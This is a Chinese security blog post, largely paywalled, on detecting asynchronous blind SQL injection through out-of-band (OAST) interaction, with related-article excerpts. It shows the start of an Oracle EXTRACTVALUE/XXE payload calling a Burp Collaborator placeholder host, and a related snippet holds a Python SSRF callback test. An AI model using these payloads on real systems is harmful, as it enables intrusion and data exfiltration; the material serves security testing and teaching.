【网络安全】基于OAST的SQL盲注

秋说

已于 2024-09-20 14:52:59 修改

阅读量2k

点赞数 5

CC 4.0 BY-SA版权

分类专栏：网络安全新手快速入门(附漏洞挖掘案例) 文章标签： web安全 sql 漏洞挖掘

于 2024-09-02 23:17:39 首次发布

原创文章，禁止转载，否则保留追究法律责任的权利。

本文链接：https://blog.youkuaiyun.com/2301_77485708/article/details/141832795

网络安全新手快速入门(附漏洞挖掘案例) 专栏收录该内容

314 篇文章 ¥49.90 ¥99.00

订阅专栏

超级会员免费看

未经许可，不得转载。

文章目录

- 前言
- 异步执行
- Payloads
- 结论

前言

OAST (Out-Of-Band Application Security Testing) SQL 注入 技术通过引发 DNS 交互或外部通信，能够识别异步处理过程中的漏洞。

在漏洞挖掘中，大多数白帽子使用时间延迟型 SQL 注入来检测 SQL 注入漏洞。然而，某些情况下，时间延迟型 SQL 注入无法检测出存在的 SQL 注入漏洞，而基于 OAST 的 SQL 注入却能成功发现这些漏洞。

异步执行

这种情况的原因可能是应用程序在异步执行 SQL 查询。当用户输入时，服务器可能通过参数化查询安全地处理参数并返回正常响应，这会导致时间延迟型 SQL 注入测试未能感受到预期的延迟，从而误判程序没有 SQL 注入漏洞。

然而，此后服务器可能在后台将请求参数保存到数据库中用于分析，这时注入攻击才会生效。基于 OAST 的 SQL 注入技术能够有效检测到这种异步处理中的漏洞。

Payloads

Oracle OAST SQL Payloads：

//DNS 查找

SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remo

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

秋说

关注关注

5
点赞
踩
6

收藏

觉得还不错? 一键收藏
4
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

德慎思信息安全-OWASP 系列之注入漏洞(上)

weixin_50763496的博客

12-18

461

OWASP 系列之注入漏洞(下) 摘要上一期，我们介绍了注入漏洞中常见的 SQL 注入漏洞，主要内容是以 MySQL 为例介绍了 SQL注入的基本原理，并举例了几个常见的注入手法与原理。本期我们来介绍其他的一些注入手法与原理、 SQL injection 接上期检查数据库信息检查数据库类型与版本我们习惯上简称为数据库管理系统为数据库，对于数据库管理系统来说分很多类型，每一种查询方法都不一样。常见的数据库类型有 Microsoft MySQL Oracle PostgreSQL 不同数据库的查询

【Academy】SQL 注入 ------ SQL injection

D-river博客

03-12

1214

SQL 注入（SQLi）是一种网络安全漏洞，允许攻击者干扰应用程序对其数据库进行的查询。这可以使攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据，或者应用程序可以访问的任何其他数据。在许多情况下，攻击者可以修改或删除这些数据，从而对应用程序的内容或行为造成持久性更改。在某些情况下，攻击者可以将 SQL 注入攻击升级，以破坏底层服务器或其他后端基础设施。这也可以使他们能够执行拒绝服务攻击。

4 条评论您还未登录，请先登录后发表或查看评论

网络安全：SQL盲注概述

Mr_qing的博客

11-25

2213

盲SQL注入在本节中，我们将描述什么是盲SQL注入，解释查找和利用盲SQL注入漏洞的各种技术。什么是盲SQL注入？当应用程序容易受到 SQL 注入的攻击，但其 HTTP 响应不包含相关 SQL 查询的结果或任何数据库错误的详细信息时，就会出现盲 SQL 注入。对于盲 SQL 注入漏洞，许多技术（如UNION攻击）无效，因为它们依赖于能够在应用程序的响应中看到注入查询的结果。仍然可以利用盲SQL注入来访问未经授权的数据，但必须使用不同的技术。通过触发条件响应来利用盲SQL注入。

dnslog服务器搭建指导

鹿鸣天涯

09-11

1046

申请云服务器时，自带一个公网ip, 但是这个公网ip没有绑定在本地的网卡中，安装interactsh会有问题， dnslog无法正常使用，需要额外再绑定一个公网ip，才可以保证dnslog正常使用。一个云服务器绑定了新的公网ip，则原来的公网ip就没有办法使用了，还会导致主机连接不上的风险，摸索过程中，暂时没有一个很成熟的方案。有一台自己的云服务器（注意: 建议申请海外的云服务器，笔者在搭建的过程中发现使用国内的服务器，搭建网站需要备案，流程比较复杂）将域名和步骤3的公网ip绑定。

带外应用安全测试（OAST）

周无争的博客

09-26

1887

什么是OAST安全测试？本文翻译自：https://portswigger.net/burp/application-security-testing/oast 带外应用程序安全测试(OAST)使用外部服务器来查看不可见的漏洞。引入它是为了进一步改进DAST(动态应用安全测试)模型。PortSwigger是使用 Burp Collaborator 进行OAST测试的先驱。这为Burp Suite增加了OAST功能——使该方法更易于使用。 OAST测试做了哪些其他方法做不到的事情？一个web应用程序可以包

带外应用程序安全测试（OAST）

weixin_46119529的博客

12-19

2691

如果在进行SQL盲注测试攻击时，即使攻击成功了，服务器可能也不会向我们发送任何有用的响应，而需要一种方法来绕过这一点。OAST带外测试方法就是通过旁路来无声地执行攻击的，期间没有任何噪音，发送攻击有效载荷与可控目标域之外的外部系统进行交互来验证测试是否成功。

SQL 盲注

周无争的博客

09-26

403

本文翻译自：https://portswigger.net/web-security/sql-injection/blind 在这一部分，我们将描述什么是盲目的SQL注入，解释各种发现和利用盲目的SQL注入漏洞的技术。什么是SQL盲注？当应用程序易受SQL注入攻击，但其HTTP响应不包含相关SQL查询的结果或任何数据库错误的详细信息时，就会出现SQL盲注。由于存在SQL盲注漏洞，许多技术(如联合注入)并不有效，因为它们依赖于能够在应用程序的响应中看到注入查询的结果。仍然有可能利用盲SQL注入来访问未经

58 同城安全团队打造的 Antenna：辅助验证网络漏洞存在及可利用性的 OAST 工具

08-24

资源下载链接为： https://pan.quark.cn/s/4b997f39e25c 58 同城安全团队打造的 Antenna：辅助验证网络漏洞存在及可利用性的 OAST 工具（最新、最全版本！打开链接下载即可用！）

实战技巧-带外应用安全测试（OAST）

ST0new的博客

02-20

2602

带外应用安全测试（OAST）这篇文章更多的是对burp Collaborator 的总结和使用。（跳转到第二部分，查看Burp Collaborator的用法）什么是OAST安全测试带外应用程序安全测试是使用外部服务器来帮助我们来查看无回显的漏洞。了解一下目前主流的集中应用安全测试技术。 DAST: 动态应用程序安全测试（Dynamic Application Security Testing）技术在测试或运行阶段分析应用程序的动态运行状态。它模拟黑客行为对应用程序进行动态攻击，分析应用程序的反应

SQL注入--DNSlog外带注入--理论

m0_56019217的博客

11-23

1216

DNS的作用是将域名解析为IP而DNSlog就是存储在DNS服务器上的域名信息，它记录着用户对域名访问信息。可以理解为DNS服务器上的日志文件。比如，以点为分隔，从右向左依次是顶级域名、二级域名、三级域名。即，net是顶级域名，csdn是二级域名，blog是三级域名。域名不区分大小写。在进行ping命令时会使用DNS解析：这里就是被解析后，与csdn.com进行了拼接，然后再去执行Ping命令。这里我们界面就回显得到了，也就是得到了的值。这个过程就可以被称为DNSlog外带。

数据库out_of_band攻击【原理分析、复现】

Sp4rkW的博客

01-18

9979

这个问题已经是去年提出的了，之前也看到过，在CTF题目环境中利用过却对原理不慎了解，在公司大佬们的帮助下成功了理解了一波原理。这里对原理进行一波总结，并利用了CEYE平台成功的进行了原理复现利用。博客原文地址：http://blog.youkuaiyun.com/wy_97/article/details/79094001 原理分析这个虽然是利用到了比如说mysql的LOAD_FILE函数，其实...

命令注入_常见web漏洞——系统命令注入

weixin_39540020的博客

01-05

3425

在本文中，我将讲述什么是系统命令注入以及如何检测和利用系统注入漏洞。并且会罗列一些针对不同操作系统比较有用的攻击命令和技术。最后则将讲述如何阻止系统命令注入攻击。什么是系统命令注入？操作系统命令注入(通常也称为脚本注入(Shell Injection))是一种web安全漏洞。攻击者可以利用其在运行应用的服务器执行任意操作系统命令。典型的后果是完全破坏应用程序及其所有数据。通常，攻击者还能...

【小迪安全】web安全｜渗透测试｜网络安全|SRC挖掘|学习笔记|2021|

weixin_45635831的博客

12-25

606

批量挖掘流程：FOFA收集目标（50万+域名）xray批量扫描（万分之一命中率）人工验证漏洞真实性提交漏洞平台源码审计优势：能深度分析算法逻辑和安全机制黑盒测试要点：常规漏洞扫描JS接口探测三方组件分析经济因素考量：部分售卖系统可能需要购买授权才能获取测试权限开发语言特征：JAVA开发系统常将核心部分封装到dll或jar文件中反编译工具：使用dnSpy等工具对编译文件进行反编译分析。

计算机网络（郑烇） 8 网络安全

qq_44845100的博客

12-28

第2天：基础入门-Web应用&架构搭建&漏洞&HTTP数据包&代理服务器|小迪安全笔记|网络安全|

最新发布

weixin_45635831的博客

12-28

595

26:07。

AI正在重塑网络安全：自动化渗透测试如何让企业“先攻后防”？

2501_93360277的博客

12-25

1080

而AI智能自动化渗透测试系统，融合前沿人工智能技术与多年实战攻防经验，将复杂的黑客攻击路径高度标准化、流程化，实现从资产发现、漏洞探测、利用验证，到报告生成、溯源分析的。系统内置针对WebLogic、OA系统、物联网、工控设备等高危场景的专项插件，支持“目标盲打”和自定义参数配置，跳过冗余步骤，直击漏洞核心。选择一套专业的AI渗透测试系统，就是为您的数字业务装上“智能雷达”与“自动盾牌”，在攻防对抗中牢牢掌握主动权，筑牢高质量发展的安全基石。全面、准确的资产画像，是构建有效防御体系的第一步。

CISAW-SS安全软件认证｜2026年培训日程公布，赋能安全开发，从代码源头筑牢防线

qq_44969472的博客

12-25

561

本课程旨在为软件生命周期的各类角色注入安全基因，培养能将安全能力深度集成到需求、设计、编码、测试全流程的专业人才。：针对主流开发语言（如Java, C/C++, Python等），讲解如何编写安全、健壮的代码，避免注入、溢出等经典漏洞。：掌握SAST、DAST、IAST等白盒、黑盒、灰盒安全测试技术，以及渗透测试、模糊测试等方法。政府、金融、能源、互联网等行业的软件项目经理、架构师、开发工程师、测试工程师。：从根本上转变“重功能、轻安全”的开发观念，全面提升团队的安全素养与实战技能。

第1天：基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过|小迪安全笔记|网络安全|

weixin_45635831的博客

12-28

493

核心知识点：文件下载类操作反弹shell技术系统权限管理系统分类：个人主机与服务器主机的区别Windows与Linux系统的命令差异网络安全要素：防火墙配置内外网隔离正向/反向连接方式权限管理：文件权限设置用户权限控制运维权限分配学习建议：掌握基础命令是前提思路比具体技术更重要避免直接攻击在线靶机。

oast

04-03

### OAST 技术介绍 OAST（Out-of-Band Application Security Testing，带外应用安全测试）是一种扩展传统 DAST 的技术手段。它通过利用外部通道来检测应用程序中的漏洞，解决了某些情况下仅依赖于直接响应数据无法发现的安全问题[^1]。 #### 工作原理 OAST 使用的技术核心在于引入了一个额外的通信机制。当扫描器发送请求到目标系统时，该请求会触发服务器向预定义的第三方服务发起新的网络连接或 DNS 查询。这种间接反馈使得即使在防火墙隔离或其他限制条件下也能捕获潜在威胁的信息。例如，在处理 SSRF （Server-Side Request Forgery，服务器端请求伪造）漏洞时，如果内部资源访问被严格控制，则常规方法可能难以识别此类风险；而采用 OAST 方法可以通过观察是否有来自受害主机对外部监控站点的成功联系行为来进行判断[^4]。 ### 应用场景分析以下是几个典型的应用场景： 1. **盲态漏洞探测** 对于那些不会立即返回错误消息给客户端但却存在安全隐患的功能模块来说尤为重要。比如 SQL 注入、命令执行等问题可能会因为过滤规则等原因导致标准注入尝试失败，此时借助 OAST 能够有效突破这些障碍并确认实际影响范围。 2. **跨域资源共享(CORS)配置不当评估** 如果 API 接口允许任意来源调用或者缺乏足够的验证措施的话，攻击者就有可能滥用此特性窃取敏感资料。运用 OAST 方案可以帮助审计人员更全面地理解 CORS 设置是否合理以及是否存在可被恶意利用之处。 3. **文件上传解析漏洞挖掘** 当涉及到复杂的 MIME 类型判定逻辑或者是基于内容而非声明头字段决定如何处置所提交文档的情况下，单纯依靠本地回显往往不足以暴露全部隐患。因此，实施带有回调机制的设计便显得尤为必要了。 ```python import requests def test_oast_callback(url, callback_server): payload = f"?url=http://{callback_server}" response = requests.get(url + payload) # Check if the request was successful and wait for a call back from server to confirm exploitability. print(f"Sent potential SSRF vector {payload}. Waiting for out of band confirmation at {callback_server}") ``` 上述代码片段展示了如何构建一个简单的 SSRF 测试案例，并设置好接收通知的服务地址以便后续跟进结果。 ---